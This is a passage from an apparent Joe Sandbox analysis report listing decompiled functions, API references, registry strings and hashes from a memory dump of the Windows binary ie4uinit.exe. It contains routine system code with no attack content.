				if (E00007FF77FF7319E1FB4(0x104, _t73, _t93 + 0x40, __rcx, __r9, _t91) < 0) goto 0x319e1b3f;
				asm("sbb edx, edx");
				 *(_t93 + 0x30) = 0x00000104 &  *(_t91 - 0x30);
				GetCurrentDirectoryW(??, ??);
				_t35 = E00007FF77FF7319C90F4(_t54,  *((intOrPtr*)(_t91 - 0x38)), _t91 - 0x20, _t91 - 0x20, _t89, _t102);
				r9d = 0;
				__imp__UrlCreateFromPathW();
				if (_t35 != 0x80004003) goto 0x319e1b2b;
				_t51 =  *(_t93 + 0x30);
				_t36 = E00007FF77FF7319E1FB4(_t51, _t73, _t93 + 0x40, _t89, __r9, _t91);
				if (_t36 < 0) goto 0x319e1b3f;
				asm("sbb edx, edx");
				r9d = 0;
				 *(_t93 + 0x30) = _t51 &  *(_t91 - 0x30);
				__imp__UrlCreateFromPathW();
				if (_t36 < 0) goto 0x319e1b3f;
				E00007FF77FF7319C1310(_t73, __r9,  *((intOrPtr*)(_t91 - 0x38)),  *((intOrPtr*)(_t91 - 0x38)), _t102);
				E00007FF77FF7319E2088(_t93 + 0x40);
				return E00007FF77FF7319E38D0(_t36, 0x104,  *(_t91 + 0x1f0) ^ _t93);
			}

0x7ff7319e19f4
0x7ff7319e19fb
0x7ff7319e1a03
0x7ff7319e1a0a
0x7ff7319e1a14
0x7ff7319e1a20
0x7ff7319e1a25
0x7ff7319e1a28
0x7ff7319e1a2c
0x7ff7319e1a35
0x7ff7319e1a38
0x7ff7319e1a3f
0x7ff7319e1a47
0x7ff7319e1a4c
0x7ff7319e1a58
0x7ff7319e1a60
0x7ff7319e1a69
0x7ff7319e1a73
0x7ff7319e1a7a
0x7ff7319e1a81
0x7ff7319e1a9a
0x7ff7319e1aac
0x7ff7319e1ab1
0x7ff7319e1ab9
0x7ff7319e1ace
0x7ff7319e1adf
0x7ff7319e1ae2
0x7ff7319e1aef
0x7ff7319e1af1
0x7ff7319e1afa
0x7ff7319e1b03
0x7ff7319e1b14
0x7ff7319e1b16
0x7ff7319e1b1c
0x7ff7319e1b23
0x7ff7319e1b2d
0x7ff7319e1b3a
0x7ff7319e1b44
0x7ff7319e1b67

APIs

PathIsURLW.SHLWAPI ref: 00007FF7319E1A3F
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7319E1AB9
UrlCreateFromPathW.SHLWAPI ref: 00007FF7319E1AE2
UrlCreateFromPathW.SHLWAPI ref: 00007FF7319E1B23
UrlApplySchemeW.SHLWAPI ref: 00007FF7319E1B9E
UrlApplySchemeW.SHLWAPI ref: 00007FF7319E1BC9

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Path$ApplyCreateFromScheme$CurrentDirectory
String ID:
API String ID: 3179412715-0
Opcode ID: 36687576c733e74d40890e99678a98e260cc5f596f0255489ef1bfa0f9dd2c22
Instruction ID: cae15bf2e0f5e72535ca73932a4dc614ffd068f55472862d1d647e999ca13331
Opcode Fuzzy Hash: 36687576c733e74d40890e99678a98e260cc5f596f0255489ef1bfa0f9dd2c22
Instruction Fuzzy Hash: E4519122F1C69296EB00EB61E480ABDA771BB48788F849035EE0E53B5DDFBCD4459720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D9DB0 Relevance: 9.1, APIs: 6, Instructions: 108COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7319D9E0E
memset.MSVCRT ref: 00007FF7319D9E1F
memset.MSVCRT ref: 00007FF7319D9E35
memset.MSVCRT ref: 00007FF7319D9E44
StrCmpICW.SHLWAPI ref: 00007FF7319D9F15
StrCmpICW.SHLWAPI ref: 00007FF7319D9F2A

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8faa8bd29350d385c0f7d56c91be330b0c651c18d62ad2940fbdcfbe6e2f6fc0
Instruction ID: 85d3eaf32511c24214c2dd13f528437c236ec4c73076965f262d25846fc3c6ed
Opcode Fuzzy Hash: 8faa8bd29350d385c0f7d56c91be330b0c651c18d62ad2940fbdcfbe6e2f6fc0
Instruction Fuzzy Hash: 97419B76B08AC1A5EB24EF26DC841E96761FBD4B88F818032DE0D47758EE7CD945D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C1440 Relevance: 9.1, APIs: 6, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 00007FF7319C148B
SysAllocStringLen.OLEAUT32 ref: 00007FF7319C14AB
SysStringLen.OLEAUT32 ref: 00007FF7319C14BC
memcpy_s.MSVCRT ref: 00007FF7319C14D8
memcpy_s.MSVCRT ref: 00007FF7319C150A
SysFreeString.OLEAUT32 ref: 00007FF7319C1533

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$memcpy_s$AllocFree
String ID:
API String ID: 3865269606-0
Opcode ID: 81a72f27ff1604e15389ff94b771ce57766a2f0e90da50425343f37cfd5eefd1
Instruction ID: 0fbd9a9b8be8cc75f64bbc3eeb011a156892c727bcc3e72a04e7ab2953551a7e
Opcode Fuzzy Hash: 81a72f27ff1604e15389ff94b771ce57766a2f0e90da50425343f37cfd5eefd1
Instruction Fuzzy Hash: 12310B61E087C2D2EB247F55D454138E3A1AF44B98F984535CADD83799CEBCE490E728

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D365C Relevance: 9.1, APIs: 6, Instructions: 95
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00007FF77FF7319D365C(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, void* __rbp, void* __r9, char _a8, long long _a16, long long _a24) {
				long _t27;
				long _t30;
				signed int _t39;
				void* _t58;
				signed int _t60;
				intOrPtr _t61;
				void* _t79;
				void* _t94;
				void* _t101;
				char* _t102;
				void* _t103;

				_t103 = __r9;
				_t95 = __rsi;
				_t77 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t79 = __rcx;
				_t4 = _t94 + 1; // 0x1
				_t61 = _t4;
				if ( *((intOrPtr*)(__rcx + 8)) == 0) goto 0x319d36c6;
				if ((WaitForSingleObject(??, ??) & 0xffffff7f) == 0) goto 0x319d36c6;
				_t27 = GetLastError();
				_t28 =  ==  ? _t61 : _t27;
				_t65 =  ==  ? _t61 : _t27;
				if (( ==  ? _t61 : _t27) > 0) goto 0x319d36aa;
				_t58 =  ==  ? _t61 : GetLastError();
				goto 0x319d36be;
				_t30 = GetLastError();
				_t31 =  ==  ? _t61 : _t30;
				_t59 = ( ==  ? _t61 : _t30) & 0x0000ffff;
				_t60 = ( ==  ? _t61 : _t30) & 0x0000ffff | 0x80070000;
				if (_t60 < 0) goto 0x319d37a4;
				if (E00007FF77FF7319DA93C(0x5000001f, __rax, __rcx, __rsi) != 0) goto 0x319d36e2;
				if (E00007FF77FF7319DA93C(0x50000020, __rax, _t79, _t95) == 0) goto 0x319d370e;
				r8d = 0;
				 *((intOrPtr*)(_t79 + 0x6c)) = 0xa;
				 *((intOrPtr*)(_t79 + 0x70)) = 0xd1;
				if (E00007FF77FF7319D43CC(0, __rax, _t79, _t79, _t101) == 0) goto 0x319d370e;
				r8d = 0;
				E00007FF77FF7319D43CC(_t61, __rax, _t79, _t79, _t101);
				if (E00007FF77FF7319DA93C(0x50000020, __rax, _t79, _t95) != 0) goto 0x319d3754;
				_t102 =  &_a8;
				 *((intOrPtr*)(_t79 + 0x6c)) = 0xd2;
				_t11 = _t77 + 3; // 0x3
				 *((intOrPtr*)(_t79 + 0x70)) = 0x199;
				if (E00007FF77FF7319D43CC(_t11, __rax, _t79, _t79, _t102) != 0) goto 0x319d3745;
				 *((intOrPtr*)(_t79 + 0x6c)) =  *((intOrPtr*)(_t79 + 0x6c)) + _a8;
				r8d = 0;
				_t16 = _t102 + 2; // 0x2
				_t39 = E00007FF77FF7319D43CC(_t16, __rax, _t79, _t79, _t102);
				__imp__#672();
				 *((char*)(_t79 + 0x34)) = _t39 & 0xffffff00 | _t39 != 0x00000000;
				E00007FF77FF7319D32A0(_t79, _t79, _t95, _t103);
				if (E00007FF77FF7319D49FC(_t39,  &_a8) < 0) goto 0x319d378d;
				E00007FF77FF7319C6B2C(_t42, _t79 + 0x54);
				E00007FF77FF7319D3484(_t79, _t79);
				if ( *((intOrPtr*)(_t79 + 8)) == 0) goto 0x319d37a4;
				ReleaseMutex(??);
				return _t60;
			}

0x7ff7319d365c
0x7ff7319d365c
0x7ff7319d365c
0x7ff7319d365c
0x7ff7319d3661
0x7ff7319d366d
0x7ff7319d3674
0x7ff7319d3674
0x7ff7319d367a
0x7ff7319d368a
0x7ff7319d368c
0x7ff7319d3694
0x7ff7319d3697
0x7ff7319d3699
0x7ff7319d36a5
0x7ff7319d36a8
0x7ff7319d36aa
0x7ff7319d36b2
0x7ff7319d36b5
0x7ff7319d36b8
0x7ff7319d36c0
0x7ff7319d36d2
0x7ff7319d36e0
0x7ff7319d36e2
0x7ff7319d36e5
0x7ff7319d36ee
0x7ff7319d36ff
0x7ff7319d3701
0x7ff7319d3709
0x7ff7319d371a
0x7ff7319d371c
0x7ff7319d3721
0x7ff7319d3728
0x7ff7319d372b
0x7ff7319d373c
0x7ff7319d3742
0x7ff7319d3745
0x7ff7319d374b
0x7ff7319d374f
0x7ff7319d375b
0x7ff7319d3769
0x7ff7319d376c
0x7ff7319d377d
0x7ff7319d3788
0x7ff7319d3790
0x7ff7319d379c
0x7ff7319d379e
0x7ff7319d37b5

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D367F
GetLastError.KERNEL32(?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D368C
GetLastError.KERNEL32(?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D369B
GetLastError.KERNEL32(?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D36AA
#672.IERTUTIL(?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D375B
ReleaseMutex.KERNEL32(?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319D379E

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$#672MutexObjectReleaseSingleWait
String ID:
API String ID: 551975906-0
Opcode ID: f890399413508bcff4e04aea9eedad67a08e2c955335bdfb9d6b53a53903cee7
Instruction ID: 6cbae39c33e17ac99500e2ca0494017ab84bc089675a4485b439fd7898315a97
Opcode Fuzzy Hash: f890399413508bcff4e04aea9eedad67a08e2c955335bdfb9d6b53a53903cee7
Instruction Fuzzy Hash: 9341A973F186C292FB80BF76D805279E395AF84B48F845134D9098369EDFACE505AB30

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CBB6C Relevance: 9.1, APIs: 6, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7319CBB96
VarBstrCmp.OLEAUT32 ref: 00007FF7319CBBBB
SysAllocString.OLEAUT32 ref: 00007FF7319CBBCC
VarBstrCmp.OLEAUT32 ref: 00007FF7319CBBED
SysFreeString.OLEAUT32 ref: 00007FF7319CBC1A
SysFreeString.OLEAUT32 ref: 00007FF7319CBC29

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$AllocBstrFree
String ID:
API String ID: 359749342-0
Opcode ID: 5a41499bae831f50223b6bbdd408a39c1f16fd81cf794b0d9cbc16646de7f832
Instruction ID: aacb00590d8c3931c798f2ef4716d196e624d7259a1e0698e4d9454554e65697
Opcode Fuzzy Hash: 5a41499bae831f50223b6bbdd408a39c1f16fd81cf794b0d9cbc16646de7f832
Instruction Fuzzy Hash: E131C531E4CA8691EB24BF16E404279B360AF48BD8F948031DA9E47B99DEBDD445DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CFCF0 Relevance: 9.1, APIs: 6, Instructions: 93
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E00007FF77FF7319CFCF0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi) {
				long _t23;
				long _t26;
				void* _t37;
				signed int _t39;
				void* _t61;
				intOrPtr _t63;
				intOrPtr* _t69;
				intOrPtr _t81;
				long long _t86;
				void* _t87;
				void* _t89;
				void* _t94;
				signed long long* _t95;

				_t83 = __rsi;
				_t66 = __rbx;
				_t61 = _t89;
				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = _t86;
				 *((long long*)(_t61 + 0x18)) = __rsi;
				 *((long long*)(_t61 + 0x20)) = __rdi;
				_t95 = __rcx + 0x10;
				_t87 = __rcx;
				_t69 =  *_t95;
				if (_t69 == 0) goto 0x319cfd29;
				_t63 =  *((intOrPtr*)( *_t69 + 0x10));
				 *0x319e7038();
				 *_t95 =  *_t95 & 0x00000000;
				_t81 =  *((intOrPtr*)(__rcx + 0x18));
				if ( *((long long*)(_t81 + 0x60)) != 0) goto 0x319cfdae;
				if ( *((intOrPtr*)(_t81 + 8)) == 0) goto 0x319cfd9f;
				if ((WaitForSingleObject(_t94) & 0xffffff7f) == 0) goto 0x319cfd8b;
				_t23 = GetLastError();
				_t24 =  ==  ? 1 : _t23;
				_t53 =  ==  ? 1 : _t23;
				if (( ==  ? 1 : _t23) > 0) goto 0x319cfd75;
				_t37 =  ==  ? 1 : GetLastError();
				goto 0x319cfda7;
				_t26 = GetLastError();
				_t27 =  ==  ? 1 : _t26;
				_t38 = ( ==  ? 1 : _t26) & 0x0000ffff;
				_t39 = ( ==  ? 1 : _t26) & 0x0000ffff | 0x80070000;
				goto 0x319cfda7;
				E00007FF77FF7319D3374(__rbx, _t81, __rsi);
				ReleaseMutex(??);
				goto 0x319cfda7;
				E00007FF77FF7319D3374(_t66, _t81, _t83);
				if ( *((long long*)(_t81 + 0x60)) == 0) goto 0x319cfe16;
				E00007FF77FF7319C1670();
				if (_t63 == 0) goto 0x319cfdca;
				E00007FF77FF7319D80E0(_t66, _t63);
				_t84 = _t63;
				goto 0x319cfdcc;
				if (_t63 == 0) goto 0x319cfe11;
				if (E00007FF77FF7319D94B4(_t66,  *((intOrPtr*)(_t81 + 0x60)), _t63, _t84) < 0) goto 0x319cfdff;
				__imp__#219();
				 *0x319e7038();
				goto 0x319cfe16;
				if (0x8007000e < 0) goto 0x319cfe1e;
				 *((char*)(_t87 + 8)) = 0;
				return 0x8007000e;
			}

0x7ff7319cfcf0
0x7ff7319cfcf0
0x7ff7319cfcf0
0x7ff7319cfcf3
0x7ff7319cfcf7
0x7ff7319cfcfb
0x7ff7319cfcff
0x7ff7319cfd09
0x7ff7319cfd0d
0x7ff7319cfd10
0x7ff7319cfd16
0x7ff7319cfd1b
0x7ff7319cfd1f
0x7ff7319cfd25
0x7ff7319cfd29
0x7ff7319cfd37
0x7ff7319cfd40
0x7ff7319cfd50
0x7ff7319cfd52
0x7ff7319cfd5f
0x7ff7319cfd62
0x7ff7319cfd64
0x7ff7319cfd70
0x7ff7319cfd73
0x7ff7319cfd75
0x7ff7319cfd7d
0x7ff7319cfd80
0x7ff7319cfd83
0x7ff7319cfd89
0x7ff7319cfd8e
0x7ff7319cfd97
0x7ff7319cfd9d
0x7ff7319cfda2
0x7ff7319cfdac
0x7ff7319cfdb3
0x7ff7319cfdbb
0x7ff7319cfdc0
0x7ff7319cfdc5
0x7ff7319cfdc8
0x7ff7319cfdcf
0x7ff7319cfde1
0x7ff7319cfdf7
0x7ff7319cfe09
0x7ff7319cfe0f
0x7ff7319cfe18
0x7ff7319cfe1a
0x7ff7319cfe3a

APIs

WaitForSingleObject.KERNEL32 ref: 00007FF7319CFD45
GetLastError.KERNEL32 ref: 00007FF7319CFD52
GetLastError.KERNEL32 ref: 00007FF7319CFD66
GetLastError.KERNEL32 ref: 00007FF7319CFD75
QISearch.SHLWAPI ref: 00007FF7319CFDF7

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ObjectSearchSingleWait
String ID:
API String ID: 3990731185-0
Opcode ID: 78a2dacb3004dc604bd8e63d7e59dca6da4c961abe510b53ee60f7bc56371330
Instruction ID: 3a3662078ecdc43942b2ad771a11fee19004f20a809544eeb2edd9b4340d7d99
Opcode Fuzzy Hash: 78a2dacb3004dc604bd8e63d7e59dca6da4c961abe510b53ee60f7bc56371330
Instruction Fuzzy Hash: 12418F21F08B82A2FB54AB26D844378A7A0EF44F88F844135DA9D4779DCFACE451E770

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D51E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FF7319D5231
GetLastError.KERNEL32 ref: 00007FF7319D52D8

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319D563D), ref: 00007FF7319D5277
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319D563D), ref: 00007FF7319D528C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319D563D), ref: 00007FF7319D52A0

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWide$HeapProcess
String ID:
API String ID: 1962985005-0
Opcode ID: aff3185ef1e3244bc23dbbd19abd5943948435dbf3656b9cea03c8d9fe8fccae
Instruction ID: 81815f930d8738f37e5e1d886a9f0a77e2cb03481f83d7880a87b83b06bb2729
Opcode Fuzzy Hash: aff3185ef1e3244bc23dbbd19abd5943948435dbf3656b9cea03c8d9fe8fccae
Instruction Fuzzy Hash: 08319632F08B86C6F750AB56D588379A3E0AF44B98F948234DB4D87358DFBCD444A360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DA93C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF77FF7319DA93C(void* __ecx, void* __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _t31;
				void* _t37;
				void* _t40;
				void* _t41;
				void* _t52;
				intOrPtr _t54;
				void* _t59;
				void* _t61;

				_t44 = __rbx;
				_t41 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				if ( *0x319f4fd8 != 0) goto 0x319da982;
				LocalAlloc(??, ??);
				_t31 = __rax;
				if (_t31 == 0) goto 0x319da982;
				asm("lock dec eax");
				if (_t31 == 0) goto 0x319da982;
				LocalFree(??);
				_t54 =  *0x319f4fd8; // 0x0
				if (_t54 != 0) goto 0x319da996;
				goto 0x319daa3c;
				if (__ecx - 0x23 <= 0) goto 0x319da9b8;
				_t4 = _t52 - 0x50000001; // 0x1e
				if (_t4 - 0x1f <= 0) goto 0x319da9b8;
				_t5 = _t52 - 0x60000001; // -268435426
				if (_t5 - 0x25 <= 0) goto 0x319da9b8;
				goto 0x319daa3c;
				E00007FF77FF7319E07A8(3, __ecx, __rax, __rbx);
				if (_t41 == 0) goto 0x319da9cb;
				goto 0x319da9da;
				asm("lock xadd [0x1a514], ebx");
				_t37 = 2 -  *0x319f4678; // 0xffffffff
				if (_t37 == 0) goto 0x319daa09;
				asm("dec ebp");
				r8d = r8d & 0x00000188;
				memset(??, ??, ??);
				 *0x319f4678 = 2;
				if (__ecx - 0x23 > 0) goto 0x319daa17;
				goto 0x319daa32;
				_t51 =  >  ? L"Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery" : L"Software\\Policies\\Microsoft\\Internet Explorer";
				_t40 =  >  ? L"Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery" : L"Software\\Policies\\Microsoft\\Internet Explorer";
				return E00007FF77FF7319E18B0(__ecx, _t44,  >  ? L"Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery" : L"Software\\Policies\\Microsoft\\Internet Explorer", _t54, _t59, _t54, _t61);
			}

0x7ff7319da93c
0x7ff7319da93c
0x7ff7319da93c
0x7ff7319da941
0x7ff7319da955
0x7ff7319da961
0x7ff7319da96a
0x7ff7319da96d
0x7ff7319da971
0x7ff7319da97a
0x7ff7319da97c
0x7ff7319da982
0x7ff7319da98c
0x7ff7319da991
0x7ff7319da999
0x7ff7319da99b
0x7ff7319da9a4
0x7ff7319da9a6
0x7ff7319da9af
0x7ff7319da9b3
0x7ff7319da9bd
0x7ff7319da9c5
0x7ff7319da9c9
0x7ff7319da9d0
0x7ff7319da9da
0x7ff7319da9e0
0x7ff7319da9f4
0x7ff7319da9f7
0x7ff7319da9fe
0x7ff7319daa03
0x7ff7319daa0c
0x7ff7319daa15
0x7ff7319daa2e
0x7ff7319daa2e
0x7ff7319daa4b

APIs

LocalAlloc.KERNEL32(?,?,00000000,00007FF7319D36D0,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319DA961
LocalFree.KERNEL32(?,?,00000000,00007FF7319D36D0,?,?,00000000,00007FF7319CD614,?,?,00000000,00007FF7319CD533), ref: 00007FF7319DA97C
memset.MSVCRT ref: 00007FF7319DA9FE

Strings

Software\Policies\Microsoft\Internet Explorer, xrefs: 00007FF7319DAA20
Software\Policies\Microsoft\Internet Explorer\Infodelivery, xrefs: 00007FF7319DAA27
Software\Microsoft\Windows\CurrentVersion\Policies, xrefs: 00007FF7319DAA0E

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Local$AllocFreememset
String ID: Software\Microsoft\Windows\CurrentVersion\Policies$Software\Policies\Microsoft\Internet Explorer$Software\Policies\Microsoft\Internet Explorer\Infodelivery
API String ID: 3749828606-3808456074
Opcode ID: 037b18cafb6c44494c45b234c174aac7b11738ca692228279d25545a2d037e9d
Instruction ID: 40454a48984a09be3279fcaae9c75292dc01e5c4d7ed8e11231fa3ad98eccd00
Opcode Fuzzy Hash: 037b18cafb6c44494c45b234c174aac7b11738ca692228279d25545a2d037e9d
Instruction Fuzzy Hash: E3319C36E0D282B2FB54BB55D884278E3A1AF44348FD19035C55E4328CDFACF9A2A731

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D39E0 Relevance: 9.1, APIs: 6, Instructions: 63
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF77FF7319D39E0(signed int __edx, long long __rax, long long __rbx, void* __rcx, char* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				long _t13;
				long _t16;
				void* _t18;
				void* _t20;
				void* _t24;
				long long _t46;
				void* _t66;

				_t61 = __rbp;
				_t47 = __rbx;
				_t46 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				 *__rdx = 0;
				_t59 = __rdx;
				if ( *((intOrPtr*)(__rcx + 8)) == 0) goto 0x319d3a51;
				_t33 = __edx | 0xffffffff;
				if ((WaitForSingleObject(??, ??) & 0xffffff7f) == 0) goto 0x319d3a51;
				_t13 = GetLastError();
				_t14 =  ==  ? 1 : _t13;
				_t38 =  ==  ? 1 : _t13;
				if (( ==  ? 1 : _t13) > 0) goto 0x319d3a39;
				_t24 =  ==  ? 1 : GetLastError();
				goto 0x319d3a4d;
				_t16 = GetLastError();
				_t17 =  ==  ? 1 : _t16;
				_t25 = ( ==  ? 1 : _t16) & 0x0000ffff;
				_t26 = ( ==  ? 1 : _t16) & 0x0000ffff | 0x80070000;
				_t41 = ( ==  ? 1 : _t16) & 0x0000ffff | 0x80070000;
				if ((( ==  ? 1 : _t16) & 0x0000ffff | 0x80070000) < 0) goto 0x319d3aa1;
				_t18 = E00007FF77FF7319D37B8(__edx | 0xffffffff, __rbx, __rcx, __rdx, __rbp);
				if (_t18 < 0) goto 0x319d3a92;
				E00007FF77FF7319D41FC(__rcx);
				__imp__#74();
				 *((long long*)(__rcx + 0x10)) = _t46;
